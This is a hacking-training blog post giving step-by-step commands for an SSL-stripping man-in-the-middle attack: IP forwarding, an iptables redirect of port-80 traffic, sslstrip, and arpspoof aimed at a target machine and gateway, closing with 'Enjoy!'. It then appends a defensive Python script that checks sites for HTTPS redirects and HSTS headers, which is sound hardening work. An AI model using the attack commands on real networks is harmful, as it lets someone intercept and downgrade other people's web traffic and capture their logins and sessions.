Ethical Hacking Training Institute
Extreme Hacking | Sadik Shaikh | Cyber Suraksha Abhiyan

How To Break SSL Protection via MITM Attack With SSLStrip Tool

sslstrip is a MITM tool that implements Moxie Marlinspike’s SSL stripping attacks. It requires Python 2.5 or newer, along with the ‘twisted’ Python module.

Requirements:

  • Python 2.5 or newer
  • The python “twisted-web” module (apt-get install python-twisted-web)

Setup

  •  Unpack: tar zxvf sslstrip-0.5.tar.gz
  •  Install twisted:  sudo apt-get install python-twisted

How to Run?

Flip your machine into forwarding mode.

echo "1" > /proc/sys/net/ipv4/ip_forward

Setup iptables to redirect HTTP traffic to sslstrip.
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port <listenPort>

Run sslstrip.
sslstrip.py -l <listenPort>

Run arpspoof to convince a network they should send their traffic to you.
arpspoof -i <interface> -t <targetIP> <gatewayIP>

Once arpspoof is capturing traffic, SSL stripping can succeed. Use the following command.
sslstrip -l 8080

Now type facebook.com or google.com into your browser and the sites open without HTTPS, for example as http://google.com 😛

Enjoy!
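
The iptables rule above only redirects port 80, so the whole setup depends on the browser sending a plain-HTTP request first. A site that redirects port 80 to HTTPS and sends an HSTS (Strict-Transport-Security) header removes that request for returning visitors. The check below is an added example, not part of the original post or of sslstrip; the function names, the 180-day floor and the sample responses are assumptions.

```python
import re

MIN_MAX_AGE = 15552000  # assumed policy floor: 180 days, in seconds
REDIRECTS = (301, 302, 307, 308)


def parse_hsts(value):
    """Parse a Strict-Transport-Security value (RFC 6797); None if invalid."""
    directives = {}
    for part in value.split(";"):
        name, _, arg = part.strip().partition("=")
        name = name.strip().lower()        # directive names are case-insensitive
        if not name:
            continue
        if name in directives:             # a repeated directive invalidates the header
            return None
        directives[name] = arg.strip().strip('"')
    if not re.fullmatch(r"\d+", directives.get("max-age", "")):
        return None                        # max-age is mandatory and numeric
    directives["max-age"] = int(directives["max-age"])
    return directives


def audit(http_status, http_headers, https_headers):
    """Return findings for one site; an empty list means none were found."""
    http_h = {k.lower(): v for k, v in http_headers.items()}
    https_h = {k.lower(): v for k, v in https_headers.items()}
    findings = []
    location = http_h.get("location", "").lower()
    if http_status not in REDIRECTS or not location.startswith("https://"):
        findings.append("port 80 does not redirect to https")
    hsts = parse_hsts(https_h.get("strict-transport-security", ""))
    if hsts is None:
        findings.append("no valid HSTS header on the https response")
    else:
        if hsts["max-age"] < MIN_MAX_AGE:
            findings.append("HSTS max-age below policy floor")
        if "includesubdomains" not in hsts:
            findings.append("HSTS does not cover subdomains")
    return findings


# Constructed sample responses (not captured from any real site).
WEAK = (200, {"Content-Type": "text/html"}, {"Content-Type": "text/html"})
HARDENED = (301, {"Location": "https://example.test/"},
            {"Strict-Transport-Security": "max-age=31536000; includeSubDomains"})

if __name__ == "__main__":
    for label, sample in (("weak", WEAK), ("hardened", HARDENED)):
        print(label, audit(*sample) or "no findings")
```

HSTS only takes effect after the browser has seen the header once over HTTPS, so a first visit stays exposed unless the host is also on the browsers' HSTS preload list.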
